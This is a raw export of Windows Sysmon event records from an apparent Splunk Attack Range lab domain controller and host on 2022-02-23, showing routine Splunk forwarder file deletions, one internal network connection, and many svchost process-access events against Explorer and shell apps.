23542300x8000000000000000285073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:39.431{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:39.400{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241D5148AA18BB17EC0A6BF2D8A9F14D,SHA256=8D714F61D4386889EDB1EF56B77318D6D56AE68670B6F7D833C6694FBDBD9962,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:36.737{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53225-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214162Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:40.889{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC3FF2B85776BB6D99DBA88A918DC73B,SHA256=0B7D0BFF8CBC399C125487A700991098F016B50B6491DAC57924DA742F5DB922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:40.510{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF202C3687ED7D265C64C2B30D227F43,SHA256=019C2D151B09E029A6E98A29BC95ED77D557D5DA315D3D48E3709843C6AE87E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214163Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:41.936{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3E2BD36082C17A81D8C1394D6062A7D,SHA256=9E4FF861C7BE66CC1C3C7064D86D525C4EE90421BE31AAD4A615F8C0EA0764F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:41.728{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AFF73A003C61A3C3E317A46F47D0239,SHA256=EE8AA69BB9F28AFFE56BEDC501491322DB5EFEE5F5248C2CCEC7AFE4D2452E19,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:42.431{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 